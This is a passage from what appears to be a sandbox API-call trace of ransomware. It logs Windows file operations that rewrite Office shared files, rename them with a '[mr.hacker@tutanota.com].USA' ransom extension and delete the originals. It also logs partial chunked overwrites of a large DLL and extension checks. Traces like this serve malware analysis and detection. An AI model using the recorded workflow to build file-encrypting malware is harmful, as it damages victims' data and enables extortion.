dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0054.069] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.069] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.070] GetLastError () returned 0x0 [0054.070] ReadFile (in: hFile=0x1f0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x9fd, lpOverlapped=0x0) returned 1 [0054.095] WriteFile (in: hFile=0x160, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0054.096] ReadFile (in: hFile=0x1f0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.096] WriteFile (in: hFile=0x160, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.096] SetEndOfFile (hFile=0x160) returned 1 [0054.096] CloseHandle (hObject=0x160) returned 1 [0054.096] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.096] SetEndOfFile (hFile=0x1f0) returned 1 [0054.097] CloseHandle (hObject=0x1f0) returned 1 [0054.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.098] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1 [0054.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.098] lstrlenW (lpString=".doc") returned 4 [0054.098] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString=".docx") returned 5 [0054.098] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0054.098] lstrlenW (lpString=".pdf") returned 4 [0054.098] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString=".xls") returned 4 [0054.098] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString=".xlsx") returned 5 [0054.098] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0054.098] lstrlenW (lpString=".ppt") returned 4 [0054.098] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.098] lstrlenW (lpString=".zip") returned 4 [0054.098] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString=".rar") returned 4 [0054.098] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0054.098] lstrlenW (lpString=".bz2") returned 4 [0054.098] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0054.098] lstrlenW (lpString=".7z") returned 3 [0054.098] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0054.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.098] lstrlenW (lpString=".dbf") returned 4 [0054.099] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString=".1cd") returned 4 [0054.099] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString=".jpg") returned 4 [0054.099] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString=".doc") returned 4 [0054.099] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString=".docx") returned 5 [0054.099] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0054.099] lstrlenW (lpString=".pdf") returned 4 [0054.099] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString=".xls") returned 4 [0054.099] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString=".xlsx") returned 5 [0054.099] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0054.099] lstrlenW (lpString=".ppt") returned 4 [0054.099] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString=".zip") returned 4 [0054.099] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString=".rar") returned 4 [0054.099] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0054.099] lstrlenW (lpString=".bz2") returned 4 [0054.099] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0054.099] lstrlenW (lpString=".7z") returned 3 [0054.099] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0054.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.099] lstrlenW (lpString=".dbf") returned 4 [0054.100] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0054.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.100] lstrlenW (lpString=".1cd") returned 4 [0054.100] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0054.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0054.100] lstrlenW (lpString=".jpg") returned 4 [0054.100] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0054.521] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0054.521] lstrlenW (lpString="VISFILT.DLL") returned 11 [0054.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0054.883] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=2124664) returned 1 [0054.883] CloseHandle (hObject=0x210) returned 1 [0054.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20 [0054.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.883] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0054.884] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0054.884] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0054.884] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.884] ReadFile (in: hFile=0x210, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.887] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.887] ReadFile (in: hFile=0x210, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.890] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0054.890] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.890] ReadFile (in: hFile=0x210, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.910] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.910] WriteFile (in: hFile=0x210, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0054.923] SetEndOfFile (hFile=0x210) returned 1 [0054.923] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x4077118 [0055.095] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.096] WriteFile (in: hFile=0x210, lpBuffer=0x4077118*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x4077118*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.097] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.097] WriteFile (in: hFile=0x210, lpBuffer=0x4077118*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x4077118*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.099] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.099] WriteFile (in: hFile=0x210, lpBuffer=0x4077118*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x4077118*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.100] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4077118 | out: hHeap=0x5d0000) returned 1 [0055.100] CloseHandle (hObject=0x210) returned 1 [0055.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.101] lstrlenW (lpString=".doc") returned 4 [0055.101] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString=".docx") returned 5 [0055.101] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0055.101] lstrlenW (lpString=".pdf") returned 4 [0055.101] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString=".xls") returned 4 [0055.101] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString=".xlsx") returned 5 [0055.101] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0055.101] lstrlenW (lpString=".ppt") returned 4 [0055.101] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.101] lstrlenW (lpString=".zip") returned 4 [0055.101] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString=".rar") returned 4 [0055.101] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.101] lstrlenW (lpString=".bz2") returned 4 [0055.101] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.101] lstrlenW (lpString=".7z") returned 3 [0055.102] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString=".dbf") returned 4 [0055.102] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString=".1cd") returned 4 [0055.102] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString=".jpg") returned 4 [0055.102] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString=".doc") returned 4 [0055.102] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString=".docx") returned 5 [0055.102] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0055.102] lstrlenW (lpString=".pdf") returned 4 [0055.102] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString=".xls") returned 4 [0055.102] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString=".xlsx") returned 5 [0055.102] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0055.102] lstrlenW (lpString=".ppt") returned 4 [0055.102] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.102] lstrlenW (lpString=".zip") returned 4 [0055.102] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString=".rar") returned 4 [0055.102] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.102] lstrlenW (lpString=".bz2") returned 4 [0055.102] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.103] lstrlenW (lpString=".7z") returned 3 [0055.103] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.103] lstrlenW (lpString=".dbf") returned 4 [0055.103] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.103] lstrlenW (lpString=".1cd") returned 4 [0055.103] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66 [0055.103] lstrlenW (lpString=".jpg") returned 4 [0055.103] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.103] lstrcmpiW (lpString1=".CGM", lpString2=".USA") returned -1 [0055.103] lstrlenW (lpString="MS.CGM") returned 6 [0055.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.167] GetFileSizeEx (in: hFile=0x248, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=1908) returned 1 [0055.167] CloseHandle (hObject=0x248) returned 1 [0055.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20 [0055.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.193] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.193] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.193] GetLastError () returned 0x0 [0055.193] ReadFile (in: hFile=0x248, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x774, lpOverlapped=0x0) returned 1 [0055.195] WriteFile (in: hFile=0x21c, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x780, lpOverlapped=0x0) returned 1 [0055.195] ReadFile (in: hFile=0x248, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.195] WriteFile (in: hFile=0x21c, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0055.196] SetEndOfFile (hFile=0x21c) returned 1 [0055.196] CloseHandle (hObject=0x21c) returned 1 [0055.196] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.196] SetEndOfFile (hFile=0x248) returned 1 [0055.197] CloseHandle (hObject=0x248) returned 1 [0055.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.197] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 1 [0055.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.197] lstrlenW (lpString=".doc") returned 4 [0055.197] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0055.197] lstrlenW (lpString=".docx") returned 5 [0055.197] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0055.197] lstrlenW (lpString=".pdf") returned 4 [0055.197] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0055.197] lstrlenW (lpString=".xls") returned 4 [0055.197] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0055.197] lstrlenW (lpString=".xlsx") returned 5 [0055.197] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0055.197] lstrlenW (lpString=".ppt") returned 4 [0055.197] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0055.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.197] lstrlenW (lpString=".zip") returned 4 [0055.197] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0055.197] lstrlenW (lpString=".rar") returned 4 [0055.198] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString=".bz2") returned 4 [0055.198] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0055.198] lstrlenW (lpString=".7z") returned 3 [0055.198] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString=".dbf") returned 4 [0055.198] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString=".1cd") returned 4 [0055.198] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString=".jpg") returned 4 [0055.198] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString=".doc") returned 4 [0055.198] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString=".docx") returned 5 [0055.198] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0055.198] lstrlenW (lpString=".pdf") returned 4 [0055.198] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString=".xls") returned 4 [0055.198] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString=".xlsx") returned 5 [0055.198] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0055.198] lstrlenW (lpString=".ppt") returned 4 [0055.198] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.198] lstrlenW (lpString=".zip") returned 4 [0055.198] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0055.198] lstrlenW (lpString=".rar") returned 4 [0055.199] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0055.199] lstrlenW (lpString=".bz2") returned 4 [0055.199] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0055.199] lstrlenW (lpString=".7z") returned 3 [0055.199] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0055.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.199] lstrlenW (lpString=".dbf") returned 4 [0055.199] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0055.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.199] lstrlenW (lpString=".1cd") returned 4 [0055.199] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0055.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0055.199] lstrlenW (lpString=".jpg") returned 4 [0055.199] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0055.199] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0055.199] lstrlenW (lpString="WPGIMP32.FLT") returned 12 [0055.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0055.200] GetFileSizeEx (in: hFile=0x248, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=280448) returned 1 